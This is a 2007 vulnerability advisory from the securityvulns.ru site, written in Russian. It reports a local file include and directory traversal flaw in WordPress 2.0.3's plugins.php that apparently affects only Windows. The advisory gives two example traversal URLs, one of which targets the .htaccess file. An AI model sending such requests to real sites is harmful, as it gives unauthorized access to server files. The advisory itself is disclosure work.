Computer Security

Security Advisory: Vulnerability in WordPress
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Inout Meta Searh engine Remote Code Execution

  RFI In Script FlashChat_v479

  [Full-disclosure] [SECURITY] [DSA 1298-1] New otrs2 packages fix cross-site scripting

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:28.05.2007
Subject:Vulnerability in WordPress

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Local file include и Directory traversal уязвимости в WordPress.

Уязвимость в файле plugins.php движка.

Local file include и Directory traversal:

http://site/wp-admin/plugins.php?page=\..\..\file.php
http://site/wp-admin/plugins.php?page=\..\..\.htaccess

Уязвимость имеет место в WordPress версии 2.0.3 (и потенциально в последующих версиях).

Похоже, что уязвимость работает лишь на Windows системах (в которых используются обратные слеши). Т.к. на Linux данная уязвимость не срабатывает.

Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/979/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server